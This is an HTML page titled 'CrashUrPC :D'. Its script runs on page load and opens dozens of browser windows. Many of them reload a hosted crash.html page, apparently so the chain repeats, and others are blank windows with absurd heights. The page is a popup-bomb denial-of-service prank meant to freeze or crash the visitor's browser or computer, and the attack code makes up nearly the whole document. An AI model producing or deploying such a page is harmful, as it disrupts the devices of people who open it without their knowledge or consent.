<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CrashUrPC :D</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
</head>

<body>
  <script>
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=295834986");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498"); var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=295834986");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=295834986");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("https://CrashUrPC.conwaytech.repl.co/crash.html", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=295834986");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=295834986");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=295834986");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=295834986");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=295834986");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=67,height=6345");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=67,height=6345");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=429,height=423498");
    var myWindow = window.open("", "", "width=67,height=6345");
  </script>